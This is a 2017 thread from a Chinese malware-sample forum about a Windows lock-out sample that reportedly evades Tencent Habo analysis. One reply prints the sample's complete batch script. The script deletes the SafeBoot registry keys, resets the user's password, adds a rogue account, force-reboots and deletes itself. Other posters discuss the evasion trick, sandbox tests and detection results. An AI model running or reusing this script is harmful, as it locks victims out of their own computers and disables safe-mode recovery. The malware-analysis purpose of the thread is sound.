楼主: 学雷锋做人
收起左侧

[病毒样本] 敲竹杠样本(作者机智绕过哈勃分析)

  [复制链接]
B100D1E55
发表于 2017-2-8 09:51:43 | 显示全部楼层
@shift
@echo off
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 00000001 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v ReportBootOk /t REG_SZ /d 0 /f
reg delete "HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\" /f
reg delete "HKEY_CURRENT_USER\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /f
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network" /f
net user %username% shenmian
net user ShenMian /add
net user ShenMian shenmian
net user administrators ShenMian /add
shutdown -r -f -t 1 -c "ShenMian"
del /s /f /q %0

…………
额,所以是怎么绕过的
wu5920
发表于 2017-2-8 10:26:32 | 显示全部楼层
B100D1E55 发表于 2017-2-8 09:51
@shift
@echo off
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 00000 ...

HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\  这里   果然很机智
cemiko 该用户已被删除
发表于 2017-2-8 10:27:55 | 显示全部楼层
本帖最后由 68221281 于 2017-2-8 10:48 编辑

弄错了  
影子好像没法重启,如果这个样本需要的话,就没法测试了。
不过,不重启直接运行样本,comodo全部允许的话,是没被锁的。
学雷锋做人
 楼主| 发表于 2017-2-8 10:38:56 | 显示全部楼层
68221281 发表于 2017-2-8 10:27
comodo 关了沙箱双击,全部允许。没发现加密的文件。
现在调用cmd.exe的程序,往往都会被重点关照吧,感觉 ...

这是勒索?看清楚是什么
学雷锋做人
 楼主| 发表于 2017-2-8 10:40:48 | 显示全部楼层
B100D1E55 发表于 2017-2-8 09:51
@shift
@echo off
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 00000 ...

你居然没看出来?慢慢看

https://habo.qq.com/file/showdet ... pk=ADYGbl1rB28IOVs0
ysj963
发表于 2017-2-8 10:46:37 | 显示全部楼层
欧阳宣 发表于 2017-2-8 07:14
ALYac        Spyware.33940        20170207
AVG        Win32/DH{OQk2gRY?}        20170207
Ad-Aware        Spyware.33940        20170207

这里面唯独没有NOD32
longan
发表于 2017-2-8 10:52:56 | 显示全部楼层
先下来试试
B100D1E55
发表于 2017-2-8 10:56:55 | 显示全部楼层
学雷锋做人 发表于 2017-2-8 10:40
你居然没看出来?慢慢看

https://habo.qq.com/file/showdetail?md5=c7f618896db9cfda77248be25ae09f88 ...

我不是哈勃高级会员没法看详情,刚刚提交了申请不知道要多久通过。。。
longan
发表于 2017-2-8 10:57:59 | 显示全部楼层
密码多少来着。。。
学雷锋做人
 楼主| 发表于 2017-2-8 10:59:03 | 显示全部楼层
B100D1E55 发表于 2017-2-8 10:56
我不是哈勃高级会员没法看详情,刚刚提交了申请不知道要多久通过。。。

哈哈,我以前申请当天就批了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-20 22:43 , Processed in 0.099939 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表